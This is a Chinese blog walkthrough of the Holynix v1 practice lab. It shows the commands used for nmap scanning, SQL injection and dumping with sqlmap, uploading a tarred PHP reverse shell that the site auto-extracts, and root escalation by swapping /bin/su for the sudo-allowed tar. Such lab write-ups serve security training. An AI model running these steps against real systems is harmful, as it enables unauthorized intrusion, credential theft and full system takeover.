holynix v1超详细靶场实战

于 2024-07-30 10:33:23 发布
阅读量207 收藏 3
点赞数 7
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68615160/article/details/140783087
版权

一、靶场搭建

搭好后发现扫描不到主机,更换一下mac地址

00:0C:29:BC:05:DE

二、主机探测与端口扫描

nmap 192.168.121.0/24

 

 发现开放80端口

三、访问80服务


 

 1.来到login页面

发现有登录框,我们进行sql注入测试

输入账号密码用burp抓包

复制请求包到kali上,在password字段后面加*号

 利用sqlmap执行命令

sqlmap -r burp.txt --batch --random-agent

 

发现存在sql注入,可使用万能密码登录

利用--dump命令打印出用户信息

sqlmap -r burp.txt --batch --random-agent --dump

2.登录

登录发现有文件上传功能点,默认万能密码登录是第一个用户,发现不能上传,我们切换第二个用户

 来到upload页面,我们上传一个webshell文件

来到用户目录下

http://192.168.121.164/~etenenbaum/

上传成功!但是未能成功解析

我们想起来了上面勾选的那个自动解压按钮,利用kali自带的webshell并将其压缩

find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
tar -czf php.tar.gz php-reverse-shell.php

 然后选中自动解压选项,上传

 发现成功自动解压,然后利用kali开启监听

 反弹成功!

3.提权

sudo -l

 

利用三方网站

https://gtfobins.github.io/

我们这里选择使用mv提权

 

sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar

可以看到,提权成功

橙子iiii
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LLaMA Factory多卡微调的实战教程
herosunly的博客
04-25 6万+
本文主要介绍了LLaMA Factory多卡微调的实战教程,希望对学习大语言模型的同学们有所帮助。 文章目录 1. 前言 2. 配置环境 2.1 安装虚拟环境 2.2 安装依赖库 2.3 模型选型与下载 2.4 配置多卡环境 3. 运行代码 3.1 构建训练数据 3.2 修改配置文件 3.3 微调 3.3.1 zero3微调 3.3.2 启动API 3.3.3 模型测试
部署大模型API的实战教程
herosunly的博客
01-17 6万+
今天给大家带来的文章是部署大模型API的实战教程,希望能对学习大模型的同学们有所帮助。 文章目录 1. 前言 2. 配置环境 2.1 安装虚拟环境 2.2 安装依赖库 3. 运行代码 3.1 修改文件 3.2 运行API 3.3 测试API
Vulnhub靶机:HOLYNIX_ V1
LainWith的博客
12-23 2238
Holynix(此系列共2台)发布日期:2010年11月27日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:需要手工设置靶机的MAC为00:0c:29:bc:05:de,然后重启靶机才能获取到靶机IP主机发现端口扫描+漏洞扫描万能密码文件包含漏洞mv提权。
vulnhub靶场/holynix
qq_45230030的博客
04-16 985
分享一下之前vulnhub的打靶记录
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3393
vulnhub靶场{GoldenEye-v1靶场实战}
GoldenEye-v1靶场
qq_35355737的博客
06-05 1728
GoldenEye-v1靶场
ChatGLM ptuning 的实战方案
热门推荐
herosunly的博客
04-26 14万+
本文主要介绍了ChatGLM ptuning 的实战方案,希望对学习大语言模型的同学们有所帮助。 文章目录 0. 简介 1. 安装虚拟环境 2. 下载文件 2.1 下载源代码 2.2 下载模型依赖文件 2.3 下载模型文件 3. 安装依赖库 4. ptuning训练 5. 运行微调后的ChatGLM
ATT&CK实战系列-红队实战(一)vulnstack 红日靶场
weixin_68652890的博客
05-20 1706
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
【项目实战课】基于Pytorch的StyleGAN v1人脸图像生成实战
hacker_long的专栏
02-22 2322
欢迎大家来到我们的项目实战课,本期内容是《基于Pytorch的StyleGAN v1人脸图像生成实战》。所谓项目实战课,就是以简单的原理回顾+详细的项目实战的模式,针对具体的某一个主题,进...
YOLO v1详细解读
YOLOv8项目贡献者
03-16 1万+
详解One-stage开山之作-Yolo v1(包含原论文截图)
级终端使用v1级终端使用v1
06-01
级终端使用v1
CH14 智能网络视频系统实战V1
06-07
智能网络视频系统实战
vue3实现WebRTC实战1v1通话
09-01
Vue3实现WebRTC实战1v1通话是一种在现代前端开发中构建实时通信应用的方法,它结合了Vue.js的组件化优势和WebRTC的实时通信能力。WebRTC(Web Real-Time Communication)是浏览器之间进行音视频通信的一套开放标准,...
报表监控V1-2.zip_ABAP实战_源代码
09-24
本文将深入探讨“报表监控V1-2.zip”提供的ABAP实战源代码,以及如何在SAP环境中搭建报表监控程序。 首先,我们要理解ABAP报表监控的重要性。在大型企业中,报表是决策制定、流程优化和问题排查的关键工具。实时、...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 325
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络安全在2024好入行吗?
最新发布
2401_84466225的博客
07-29 338
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
第三周:网络应用(上)
Vincent_Zhang233的博客
07-26 223
一、网络应用(层)内容概述我们已经知道,Internet的体系结构是符合TCP/IP协议栈的,而“应用层”就在这个协议的最上层。
S5730举例
jjjxxxhhh123的博客
07-27 944
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值